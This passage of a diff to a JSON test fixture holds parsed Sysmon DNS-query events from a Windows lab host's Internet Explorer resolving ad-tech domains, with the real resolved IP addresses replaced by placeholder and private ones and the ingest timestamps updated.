Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802369600Z'/\u003e\u003cEventRecordID\u003e102\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.070\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epm.w55c.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 dxedge-prod-lb-946522505.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.802Z", @@ -4827,11 +4749,11 @@ }, "answers": [ { - "data": "35.186.239.238", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -4839,7 +4761,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -4847,7 +4769,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -4855,7 +4777,7 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" }, { @@ -4863,7 +4785,7 @@ "type": "AAAA" }, { - "data": "192.12.94.30", + "data": "192.168.94.30", "type": "A" }, { @@ -4871,23 +4793,23 @@ "type": "AAAA" }, { - "data": "192.35.51.30", + "data": "192.168.51.30", "type": "A" } ], "resolved_ip": [ - "35.186.239.238", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30", + "192.168.94.30", "2001:502:1ca1::30", - "192.35.51.30" + "192.168.51.30" ] }, "network": { @@ -4902,24 +4824,24 @@ "cm.eyereturn.com" ], "ip": [ - "35.186.239.238", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30", + "192.168.94.30", "2001:502:1ca1::30", - "192.35.51.30" + "192.168.51.30" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313797014Z", + "ingested": "2021-12-09T13:49:44.739307800Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802391800Z'/\u003e\u003cEventRecordID\u003e103\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.093\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecm.eyereturn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:35.186.239.238;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;192.35.51.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802391800Z'/\u003e\u003cEventRecordID\u003e103\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.093\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecm.eyereturn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;192.168.51.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.802Z", @@ -4983,12 +4905,12 @@ "type": "CNAME" }, { - "data": "172.217.10.66", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "172.217.10.66" + "89.160.20.156" ] }, "network": { @@ -5004,13 +4926,13 @@ "www.googletagservices.com" ], "ip": [ - "172.217.10.66" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313798426Z", + "ingested": "2021-12-09T13:49:44.739313700Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802402000Z'/\u003e\u003cEventRecordID\u003e104\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.099\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ewww.googletagservices.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pagead46.l.doubleclick.net;::ffff:172.217.10.66;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802402000Z'/\u003e\u003cEventRecordID\u003e104\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.099\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ewww.googletagservices.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pagead46.l.doubleclick.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.802Z", @@ -5074,11 +4996,11 @@ "type": "CNAME" }, { - "data": "173.231.178.117", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -5086,7 +5008,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -5094,7 +5016,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -5102,7 +5024,7 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" }, { @@ -5110,7 +5032,7 @@ "type": "AAAA" }, { - "data": "192.12.94.30", + "data": "192.168.94.30", "type": "A" }, { @@ -5119,16 +5041,16 @@ } ], "resolved_ip": [ - "173.231.178.117", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30", + "192.168.94.30", "2001:502:1ca1::30" ] }, @@ -5145,23 +5067,23 @@ "cm.adgrx.com" ], "ip": [ - "173.231.178.117", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30", + "192.168.94.30", "2001:502:1ca1::30" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313799893Z", + "ingested": "2021-12-09T13:49:44.739319600Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802413000Z'/\u003e\u003cEventRecordID\u003e105\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.107\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecm.adgrx.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 rtb.adgrx.com;::ffff:173.231.178.117;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802413000Z'/\u003e\u003cEventRecordID\u003e105\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.107\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecm.adgrx.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 rtb.adgrx.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.802Z", @@ -5229,11 +5151,11 @@ "type": "CNAME" }, { - "data": "104.193.83.156", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -5241,7 +5163,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -5249,7 +5171,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -5257,7 +5179,7 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" }, { @@ -5266,14 +5188,14 @@ } ], "resolved_ip": [ - "104.193.83.156", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30" ] }, @@ -5291,21 +5213,21 @@ "csm2waycm-atl.netmng.com" ], "ip": [ - "104.193.83.156", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313801174Z", + "ingested": "2021-12-09T13:49:44.739324600Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802423900Z'/\u003e\u003cEventRecordID\u003e106\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.107\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecsm2waycm-atl.netmng.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 j2waycm.netmng.com;type: 5 j2waycm-us-wdc.netmng.com;::ffff:104.193.83.156;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802423900Z'/\u003e\u003cEventRecordID\u003e106\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.107\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecsm2waycm-atl.netmng.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 j2waycm.netmng.com;type: 5 j2waycm-us-wdc.netmng.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.802Z", @@ -5355,7 +5277,7 @@ "level": "information" }, "event": { - "ingested": "2021-10-14T04:10:32.313802503Z", + "ingested": "2021-12-09T13:49:44.739327900Z", "code": "4", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e4\u003c/EventID\u003e\u003cVersion\u003e3\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e4\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:38.011477000Z'/\u003e\u003cEventRecordID\u003e2\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4516'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:38.011\u003c/Data\u003e\u003cData Name='State'\u003eStarted\u003c/Data\u003e\u003cData Name='Version'\u003e9.01\u003c/Data\u003e\u003cData Name='SchemaVersion'\u003e4.20\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", @@ -5419,12 +5341,12 @@ "type": "CNAME" }, { - "data": "72.30.2.182", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "72.30.2.182" + "89.160.20.156" ] }, "network": { @@ -5440,13 +5362,13 @@ "pr-bh.ybp.yahoo.com" ], "ip": [ - "72.30.2.182" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313803837Z", + "ingested": "2021-12-09T13:49:44.739332700Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802433000Z'/\u003e\u003cEventRecordID\u003e107\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.112\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epr-bh.ybp.yahoo.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ds-pr-bh.ybp.gysm.yahoodns.net;::ffff:72.30.2.182;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802433000Z'/\u003e\u003cEventRecordID\u003e107\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.112\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epr-bh.ybp.yahoo.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ds-pr-bh.ybp.gysm.yahoodns.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.802Z", @@ -5506,12 +5428,12 @@ }, "answers": [ { - "data": "3.83.220.223", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "3.83.220.223" + "89.160.20.156" ] }, "network": { @@ -5526,13 +5448,13 @@ "ps.eyeota.net" ], "ip": [ - "3.83.220.223" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313805112Z", + "ingested": "2021-12-09T13:49:44.739337800Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802441200Z'/\u003e\u003cEventRecordID\u003e108\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' 